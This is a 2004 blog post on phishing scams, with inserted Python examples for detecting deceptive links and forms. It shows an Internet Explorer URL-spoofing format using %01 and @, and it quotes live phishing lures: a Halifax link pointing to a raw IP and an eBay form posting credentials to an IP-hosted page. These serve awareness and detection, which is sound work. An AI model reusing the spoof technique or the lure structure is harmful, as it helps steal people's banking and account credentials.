Wednesday, March 31, 2004

Phishing for phoneys
Phishers target the unwary. There's nothing too sophisticated in their
scams: they simply pretend to be your bank or building society or similar
institution, and ask for your details. A typical scam is to send you an
email with a forged From: address (nothing in ordinary email checks that
header, and many web-based email clients let you type any From address you
like into them, so it's not hard to do) so that it looks like it comes from
the bank. The message often says something like "There is a current fraud
happening - to stop it please go to this address (some URL given) and enter
all your details". By warning you about fraud it tries to make itself look
trustworthy. The cleverer ones make the URL you are going to look genuine by
exploiting a flaw (for which a patch is available) in Internet Explorer. In
a URL, anything before an @ in the host part is treated as a login name
rather than the site name, and an unpatched IE stopped displaying the address
at the %01 (a hidden control character) placed just before the @. So a URL
of the form

http://www.bestbankintheworld.com%01*AT*fakersRus.com

displays as

http://www.bestbankintheworld.com

in unpatched browsers, but actually takes you to the fakersRus.com site. This
fake site copies the graphics and layout of the true site, but your details
are captured and stored before you are forwarded to the genuine one.

(interesting aside - *AT* should be @, but if I put that in the page then my virus scanner picks up that a URL spoof is occurring and gives me a warning message about the HTML file! So there's another lesson - keep your virus scanner up to date as well because it protects you more than you (or I!) know)
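To see what a browser really does with the address above, here is an added Python example (mine, not from the original post), using the standard library's URL parser. The URLs are constructed from the post's example with the *AT* written as a literal @; the unpatched_ie_display function only models the display bug the post describes (cutting the shown address at the control character), it is not browser code, and the expected host name passed to safe_to_follow is an assumption for the example.

```python
from urllib.parse import urlsplit, unquote

# Constructed URLs modelled on the post's example; "*AT*" there is a literal "@".
SPOOFED = "http://www.bestbankintheworld.com%01@fakersRus.com"
GENUINE = "http://www.bestbankintheworld.com/login"


def real_host(url: str) -> str:
    """Host a browser actually connects to.

    The URL syntax allows an optional "user:password@" in front of the host,
    so everything up to the last "@" in the authority part is login
    information, not the site name.  urlsplit() applies that rule and
    lowercases the result.
    """
    return urlsplit(url).hostname or ""


def login_part(url: str) -> str:
    """The "user" portion hiding in front of the "@" ("" if there is none)."""
    return urlsplit(url).username or ""


def unpatched_ie_display(url: str) -> str:
    """Models what the unpatched IE address bar showed, as the post describes:
    the authority text cut off at the first percent-decoded control character
    (%01 here), so only the decoy name in front of it was visible.
    This is an illustration of the display bug, not real browser code."""
    shown = []
    for ch in unquote(urlsplit(url).netloc):
        if ord(ch) < 0x20:
            break
        shown.append(ch)
    return "".join(shown)


def spoof_report(url: str) -> dict:
    """Compare the name the victim would have seen with the real destination."""
    shown = unpatched_ie_display(url)
    real = real_host(url)
    return {
        "shown": shown,
        "real": real,
        "login_part": login_part(url),
        "spoofed": shown.lower() != real,
    }


def safe_to_follow(url: str, expected_host: str) -> bool:
    """The check a mail client or a careful user should apply: refuse any link
    that carries login information in the URL, or whose real host is not the
    expected one (exact match or a subdomain of it)."""
    if login_part(url):
        return False
    real = real_host(url)
    expected = expected_host.lower()
    return real == expected or real.endswith("." + expected)


if __name__ == "__main__":
    for url in (SPOOFED, GENUINE):
        print(url)
        print("  ", spoof_report(url))
        print("   safe for www.bestbankintheworld.com?",
              safe_to_follow(url, "www.bestbankintheworld.com"))
```

Run it and the spoofed URL reports shown=www.bestbankintheworld.com but real=fakersrus.com, with the whole decoy name sitting in the login part; a link with anything at all in that login part deserves suspicion, because no bank puts your username in a URL.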


How to spot this? Basic awareness, really: no genuine bank or other
organisation will ever, ever ask you for key information by sending you an
email and telling you to go to a site. Moreover, they'll never ask you for
account names, numbers, passwords, PINs and key words all to be
confirmed on one page. In general, phishing emails are badly spelt and
quite easy to spot. If you look at the source of the message you can
often tell that it is a fraud: one doing the rounds at the moment has a
link of the form

<a href="http://218.44.251.101/h/formslogin.html">
https://www.halifax-online.co.uk/_mem_bin/formslogin.asp</a>

so whilst the visible text looks like the Halifax site, the link actually
goes to 218.44.251.101, and that address is what turns up in the address
bar when you get there. I keep getting emails from organisations I'm not
even a member of!

Note that it's not enough to assume that because you are on a secure site
(https URL, and padlock in the bottom right of the IE browser) you are safe,
since anyone can set up a secure server: the padlock only tells you that the
connection to whoever runs that server is encrypted, not that the server
belongs to your bank. Check that the name in the address bar (and in the
certificate behind the padlock) is really your bank's. But you should never
enter security information into a non-secure site.

How else to protect yourself? Patch your system and keep it up to date. If
users kept their systems current then many of the technical tricks that are
played would not work. I know it's a pain to do. Simple awareness is
required: be as suspicious of anything in your inbox as you would be of a
stranger who knocks on your door. If you're in doubt, ignore it - if it is
urgent the bank will write you a letter - or phone the bank to check, using
a number from your card or a statement rather than one given in the email.

There's another one just landed in my inbox, slightly cleverer than many.
It's an HTML email, so it displays automatically in my preview pane, and
all the obvious links in it point to the real eBay site: clicking on them
takes you to the official site. It also has a forged From: header. But
since eBay never send out such emails, it must be a fake. Inspecting the
code (right-click, View Source, in IE) shows that the submit button at the
bottom posts the form to

<FORM name=Simple action=http://209.197.232.11/~narghile/d.php method=post>

i.e. some person's page that records your details and then forwards you
almost immediately to the official eBay sign-in page (it's not clever
enough to actually sign you in). I know cos I tried it (with a fake id).
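Both of the tricks in the message source - the Halifax link whose visible text is one address while its href is another, and the eBay form whose submit button posts to a stranger's server - can be caught mechanically. The following is an added Python example (mine, not from the original post or from any mail client) that parses an HTML email and reports anchors whose displayed URL does not match the real destination, links to hosts outside the sites being imitated, and forms that post to a raw IP address or to an untrusted host. The sample message is constructed around the two links quoted in the post, the extra Help link stands in for the eBay mail's genuine-looking links, and the TRUSTED_HOSTS list is an assumption for the example.

```python
from html.parser import HTMLParser
from ipaddress import ip_address
from urllib.parse import urlsplit

# Constructed HTML mail fragment built around the two links quoted in the post
# (the Halifax anchor and the eBay form action).  Not a real message.
SAMPLE_EMAIL = """
<p>Please confirm your details:</p>
<a href="http://218.44.251.101/h/formslogin.html">
https://www.halifax-online.co.uk/_mem_bin/formslogin.asp</a>
<a href="https://www.halifax-online.co.uk/help/">Help and support</a>
<FORM name=Simple action=http://209.197.232.11/~narghile/d.php method=post>
  <input name=userid> <input name=pass type=password>
  <input type=submit value="Sign In">
</FORM>
"""

# Hosts the imitated sites legitimately use (assumed for this example).
TRUSTED_HOSTS = {"halifax-online.co.uk", "ebay.com", "ebay.co.uk"}


class _LinkCollector(HTMLParser):
    """Collects every anchor as (href, visible text) and every form action."""

    def __init__(self):
        super().__init__()
        self.anchors = []
        self.forms = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "a":
            self._href = attrs.get("href") or ""
            self._text = []
        elif tag == "form":
            self.forms.append(attrs.get("action") or "")

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(url):
    """Real host of a URL (after any user@ part), lowercased; "" if none."""
    return (urlsplit(url).hostname or "").lower()


def is_ip_literal(host):
    try:
        ip_address(host)
    except ValueError:
        return False
    return True


def is_trusted(host, trusted):
    return any(host == t or host.endswith("." + t) for t in trusted)


def audit_email(html, trusted=TRUSTED_HOSTS):
    """Return (kind, host) findings for the deceptions the post describes."""
    parser = _LinkCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for href, text in parser.anchors:
        real = host_of(href)
        # Visible text that looks like a URL but names a different host.
        if text.lower().startswith(("http://", "https://")):
            if host_of(text) != real:
                findings.append(("link-text-mismatch", real))
        if real and not is_trusted(real, trusted):
            findings.append(("untrusted-link-host", real))
    for action in parser.forms:
        target = host_of(action)
        if is_ip_literal(target):
            findings.append(("form-posts-to-ip", target))
        if target and not is_trusted(target, trusted):
            findings.append(("untrusted-form-host", target))
    return findings


if __name__ == "__main__":
    for kind, host in audit_email(SAMPLE_EMAIL):
        print(f"{kind:22s} {host}")
```

The form check matters more than the link check: a phisher can afford to make every visible link genuine, as the eBay mail did, because the only thing that has to go to their server is the form action.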

And why? Because sellers with good ratings are valuable commodities on
eBay - they are trusted - so capturing one or two of them lets somebody
shift a lot of stuff under a reputation that isn't theirs.


This page is powered by Blogger. Isn't yours? (c) 2003-2005 Russell Beale